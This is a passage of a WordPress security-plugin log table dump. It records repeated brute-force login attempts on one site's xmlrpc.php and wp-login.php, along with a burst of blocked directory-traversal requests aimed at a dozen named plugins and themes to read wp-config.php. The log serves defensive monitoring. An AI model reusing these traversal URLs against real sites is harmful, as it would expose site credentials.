Firefox/62.0','loginFailValidUsername',NULL,NULL),(6960,0.000000,1629606683.496988,'\0\0\0\0\0\0\0\0\0\0������',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6961,0.000000,1629606907.784931,'\0\0\0\0\0\0\0\0\0\0��Wb��',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6962,0.000000,1629607146.142730,'\0\0\0\0\0\0\0\0\0\0���q\0�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6963,0.000000,1629607171.528688,'\0\0\0\0\0\0\0\0\0\0��g�\Z',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36','loginFailValidUsername',NULL,NULL),(6964,0.000000,1629607370.910387,'\0\0\0\0\0\0\0\0\0\0��[�ɤ',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6965,0.000000,1629607602.946560,'\0\0\0\0\0\0\0\0\0\0��UX�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6966,0.000000,1629607843.251743,'\0\0\0\0\0\0\0\0\0\0���]c8',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6967,0.000000,1629608067.994547,'\0\0\0\0\0\0\0\0\0\0��H�.�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6968,0.000000,1629608301.192183,'\0\0\0\0\0\0\0\0\0\0��u,�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6969,0.000000,1629608546.972629,'\0\0\0\0\0\0\0\0\0\0���[h�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6970,0.000000,1629608744.511274,'\0\0\0\0\0\0\0\0\0\0��gZ�j',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6971,0.000000,1629608981.474271,'\0\0\0\0\0\0\0\0\0\0���Qٌ',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6972,0.000000,1629609240.081963,'\0\0\0\0\0\0\0\0\0\0��Q�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6973,0.000000,1629609464.918940,'\0\0\0\0\0\0\0\0\0\0��(E��',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36','loginFailValidUsername',NULL,NULL),(6974,0.000000,1629609479.003450,'\0\0\0\0\0\0\0\0\0\0����{�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6975,0.000000,1629609696.267518,'\0\0\0\0\0\0\0\0\0\0��g�t2',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6976,0.000000,1629609940.722138,'\0\0\0\0\0\0\0\0\0\0��P��\Z',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6977,0.000000,1629610176.962336,'\0\0\0\0\0\0\0\0\0\0��.��',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6978,0.000000,1629610376.832371,'\0\0\0\0\0\0\0\0\0\0����E',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6979,0.000000,1629610586.840818,'\0\0\0\0\0\0\0\0\0\0����\"E',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36','loginFailValidUsername',NULL,NULL),(6980,0.000000,1629610647.039359,'\0\0\0\0\0\0\0\0\0\0���VBe',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6981,0.000000,1629610865.731433,'\0\0\0\0\0\0\0\0\0\0���Dt',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6982,0.000000,1629611099.852316,'\0\0\0\0\0\0\0\0\0\0��Ȗ��',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6983,0.000000,1629611319.507879,'\0\0\0\0\0\0\0\0\0\0��.eշ',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6984,0.000000,1629611562.369713,'\0\0\0\0\0\0\0\0\0\0��12�k',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6985,0.000000,1629611711.054910,'\0\0\0\0\0\0\0\0\0\0��#��C',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36','loginFailValidUsername',NULL,NULL),(6986,0.000000,1629611949.538715,'\0\0\0\0\0\0\0\0\0\0�����o',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6987,0.000000,1629612210.138640,'\0\0\0\0\0\0\0\0\0\0��\\>cc',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6988,0.000000,1629612448.875352,'\0\0\0\0\0\0\0\0\0\0��B��',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6989,0.000000,1629612639.547252,'\0\0\0\0\0\0\0\0\0\0��g1?',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6990,0.000000,1629612829.779928,'\0\0\0\0\0\0\0\0\0\0���\rKz',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36','loginFailValidUsername',NULL,NULL),(6991,0.000000,1629612877.183610,'\0\0\0\0\0\0\0\0\0\0��[��',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6992,0.000000,1629613118.579551,'\0\0\0\0\0\0\0\0\0\0��gt�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6993,0.000000,1629613331.154841,'\0\0\0\0\0\0\0\0\0\0��ϔK',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6994,0.000000,1629613550.749327,'\0\0\0\0\0\0\0\0\0\0��.ePS',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6995,0.000000,1629613806.773215,'\0\0\0\0\0\0\0\0\0\0��2��',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6996,0.000000,1629613946.181569,'\0\0\0\0\0\0\0\0\0\0���Dd@',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36','loginFailValidUsername',NULL,NULL),(6997,0.000000,1629614028.632498,'\0\0\0\0\0\0\0\0\0\0��3D(',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6998,1629614107.896079,1629614107.566200,'\0\0\0\0\0\0\0\0\0\0����a�',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64)','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(6999,1629614104.736346,1629614104.357400,'\0\0\0\0\0\0\0\0\0\0����a�',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64)','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(7000,1629614124.985216,1629614124.721300,'\0\0\0\0\0\0\0\0\0\0����a�',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-content/themes/mTheme-Unus/css/css.php?files=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64)','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlc10=\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL21UaGVtZS1VbnVzL2Nzcy9jc3MucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(7001,1629614121.850511,1629614121.578400,'\0\0\0\0\0\0\0\0\0\0����a�',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-content/plugins/google-mp3-audio-player/direct_download.php?file=..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64)','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9nb29nbGUtbXAzLWF1ZGlvLXBsYXllci9kaXJlY3RfZG93bmxvYWQucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(7002,1629614115.093033,1629614114.832200,'\0\0\0\0\0\0\0\0\0\0����a�',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64)','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9jaGVycnktcGx1Z2luL2FkbWluL2ltcG9ydC1leHBvcnQvZG93bmxvYWQtY29udGVudC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(7003,1629614145.177528,1629614144.914500,'\0\0\0\0\0\0\0\0\0\0����a�',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text%2Fhtml&mla_download_file=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64)','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1ttbGFfZG93bmxvYWRfZmlsZV0=\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tZWRpYS1saWJyYXJ5LWFzc2lzdGFudC9pbmNsdWRlcy9tbGEtZmlsZS1kb3dubG9hZGVyLnBocA==\",\"category\":\"lfi\",\"ssl\":1}'),(7004,1629614171.067980,1629614170.790200,'\0\0\0\0\0\0\0\0\0\0����a�',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-content/force-download.php?file=..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64)','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvZm9yY2UtZG93bmxvYWQucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(7005,1629614167.564308,1629614167.273200,'\0\0\0\0\0\0\0\0\0\0����a�',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-content/plugins/db-backup/download.php?file=..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64)','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9kYi1iYWNrdXAvZG93bmxvYWQucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(7006,1629614164.507939,1629614164.242500,'\0\0\0\0\0\0\0\0\0\0����a�',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64)','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hc3Bvc2UtZG9jLWV4cG9ydGVyL2FzcG9zZV9kb2NfZXhwb3J0ZXJfZG93bmxvYWQucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(7007,1629614161.444360,1629614161.151300,'\0\0\0\0\0\0\0\0\0\0����a�',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64)','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1zdXBwb3J0LXBsdXMtcmVzcG9uc2l2ZS10aWNrZXQtc3lzdGVtL2luY2x1ZGVzL2FkbWluL2Rvd25sb2FkQXR0YWNobWVudC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(7008,1629614158.555267,1629614158.293800,'\0\0\0\0\0\0\0\0\0\0����a�',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-content/themes/NativeChurch/download/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64)','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL05hdGl2ZUNodXJjaC9kb3dubG9hZC9kb3dubG9hZC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(7009,1629614155.596607,1629614155.331600,'\0\0\0\0\0\0\0\0\0\0����a�',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-content/plugins/simple-image-manipulator/controller/download.php?filepath=..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64)','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlcGF0aF0=\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zaW1wbGUtaW1hZ2UtbWFuaXB1bGF0b3IvY29udHJvbGxlci9kb3dubG9hZC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(7010,1629614152.395224,1629614152.047900,'\0\0\0\0\0\0\0\0\0\0����a�',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-admin/admin-ajax.php?action=kbslider_show_image&img=..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64)','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(7011,1629614183.142345,1629614182.857600,'\0\0\0\0\0\0\0\0\0\0����a�',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-content/plugins/membership-simplified-for-oap-members-only/download.php?download_file=...%2F.%2F...%2F.%2F...%2F.%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64)','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tkb3dubG9hZF9maWxlXQ==\",\"paramValue\":\"Li4uLy4vLi4uLy4vLi4uLy4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tZW1iZXJzaGlwLXNpbXBsaWZpZWQtZm9yLW9hcC1tZW1iZXJzLW9ubHkvZG93bmxvYWQucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(7012,1629614180.373039,1629614180.107900,'\0\0\0\0\0\0\0\0\0\0����a�',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-content/plugins/mac-dock-gallery/macdownload.php?albid=..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64)','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1thbGJpZF0=\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tYWMtZG9jay1nYWxsZXJ5L21hY2Rvd25sb2FkLnBocA==\",\"category\":\"lfi\",\"ssl\":1}'),(7013,1629614177.324618,1629614177.032500,'\0\0\0\0\0\0\0\0\0\0����a�',0,403,0,0,0,'https://www.equalitywalk.org.uk/wp-content/plugins/recent-backups/download-file.php?file_link=..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64)','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlX2xpbmtd\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9yZWNlbnQtYmFja3Vwcy9kb3dubG9hZC1maWxlLnBocA==\",\"category\":\"lfi\",\"ssl\":1}'),(7014,0.000000,1629614260.535000,'\0\0\0\0\0\0\0\0\0\0���֣%',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7015,0.000000,1629614492.722234,'\0\0\0\0\0\0\0\0\0\0��gV�]',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7016,0.000000,1629614734.447013,'\0\0\0\0\0\0\0\0\0\0��E��|',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7017,0.000000,1629614963.330403,'\0\0\0\0\0\0\0\0\0\0����6p',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7018,0.000000,1629615068.490621,'\0\0\0\0\0\0\0\0\0\0������',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36','loginFailValidUsername',NULL,NULL),(7019,0.000000,1629615198.348779,'\0\0\0\0\0\0\0\0\0\0��go(',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7020,0.000000,1629615671.508687,'\0\0\0\0\0\0\0\0\0\0�����|',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7021,0.000000,1629615904.072313,'\0\0\0\0\0\0\0\0\0\0��w��',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7022,0.000000,1629616191.530773,'\0\0\0\0\0\0\0\0\0\0���;v�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36','loginFailValidUsername',NULL,NULL),(7023,0.000000,1629616198.715244,'\0\0\0\0\0\0\0\0\0\0��w4�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7024,0.000000,1629616668.200917,'\0\0\0\0\0\0\0\0\0\0��g�k',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7025,0.000000,1629616922.162747,'\0\0\0\0\0\0\0\0\0\0���Q֨',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7026,0.000000,1629617165.823578,'\0\0\0\0\0\0\0\0\0\0���Ʈ�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7027,0.000000,1629617309.208843,'\0\0\0\0\0\0\0\0\0\0��T��',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36','loginFailValidUsername',NULL,NULL),(7028,0.000000,1629617432.981992,'\0\0\0\0\0\0\0\0\0\0��g�y�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7029,0.000000,1629617691.921570,'\0\0\0\0\0\0\0\0\0\0��E��t',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7030,0.000000,1629617928.786551,'\0\0\0\0\0\0\0\0\0\0���G�a',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7031,0.000000,1629618201.073651,'\0\0\0\0\0\0\0\0\0\0��@Z0�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 